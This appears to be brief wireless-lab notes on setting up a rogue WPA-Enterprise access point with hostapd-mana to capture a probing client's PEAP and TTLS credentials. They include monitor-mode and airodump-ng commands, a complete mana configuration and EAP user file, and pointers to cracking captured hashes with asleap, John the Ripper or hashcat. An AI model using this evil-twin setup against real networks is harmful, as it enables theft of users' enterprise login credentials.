Mana
The aim on the below labs was to retrieve credentials of a client that is using different types of authentication such as PEAP-GTC, PEAP-MSCHAPv2, TTLS-PAP, TTLS-CHAP and TTLS-MSCHAPv2
PEAP-GTC
Set the device into monitor mode and check for networks with airodump-ng
iw dev wlan0 set monitor none
airodump-ng wlan0
Airodump shows that there is a client probing for the BlueDorkCorp network. Create a mana config file as well as the user file.
// mana config
interface=wlan1
ssid=BlueDorkCorp
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
// user file
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]
Start mana with the config file and observe the plain text creds.

TTLS-MSCHAPv2
Same as above but this time you will need to use asleap to crack the password.


TTLS-CHAP
Same setup as above but you will need to try to crack the password with jtr or hashcat.

TTLS-PAP
Same setup as the first, but creds come in plain text.

PEAP-MSCHAPv2
Same as the initial setup, but need to crack the hash or challenge / response.


Last updated